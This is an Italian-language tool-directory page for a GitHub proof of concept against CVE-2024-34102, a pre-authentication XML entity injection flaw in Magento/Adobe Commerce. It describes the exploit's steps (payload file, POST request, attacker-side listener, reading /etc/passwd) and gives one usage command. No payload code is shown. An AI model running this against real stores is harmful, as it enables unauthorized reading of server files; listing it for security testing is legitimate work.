Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-34102 — POC per CVE-2024-34102. Un problema di iniezione di entità XML pre-autenticazione in Magento / Adobe Commerce. | Kitploit
Strumenti/GitHubGitHub/bigb0x/cve-2024-34102
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubbigb0x/cve-2024-34102

CVE-2024-34102

POC per CVE-2024-34102. Un problema di iniezione di entità XML pre-autenticazione in Magento / Adobe Commerce.

Vedi Repository
311312 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-34102

POC per CVE-2024-34102. Un problema di iniezione di entità XML pre-autenticazione in Magento / Adobe Commerce.

Banner

Panoramica

Questo POC tenterà di leggere file da host target vulnerabili al recente CVE-2024-34102 di Magento / Adobe Commerce. Questo POC si basa su questo avviso di sicurezza e su questa ricerca di Assetnote.

Come Usare

Per eseguire questo POC, avrai bisogno di una macchina con un IP pubblicato e accessibile.

Cosa Fa Questo POC

  1. Crea un file locale poc.xml contenente i payload principali.
  2. Invia il payload al target tramite una richiesta POST.
  3. Imposta un listener sulla tua macchina per le richieste GET in arrivo dal target.
  4. Tenta di leggere file dal target (predefinito: /etc/passwd).

Requisiti Minimi

  • Python 3.6 o superiore
  • libreria requests

Per usare questo POC contro un singolo target:

root@kitploit:~
python cve-2024-34102.py -u target -ip your-machine-ip -p any-open-port-in-your-machine -r file-to-read-from-target (default is /etc/passwd)

Contatti

Per qualsiasi suggerimento o idea, contatta me.

Dichiarazione di non responsabilità

Questo strumento fornito è solo a scopo educativo. Non incoraggio, approvo né supporto l'accesso non autorizzato a qualsiasi sistema o rete. Usa questo strumento in modo responsabile e solo su sistemi per i quali hai esplicita autorizzazione a testare. Ogni azione e conseguenza derivante dall'uso improprio di questo strumento è di tua esclusiva responsabilità.

Riferimenti

  • https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md
  • https://www.assetnote.io/resources/research/why-nested-deserialization-is-harmful-magento-xxe-cve-2024-34102
Scarica lo strumento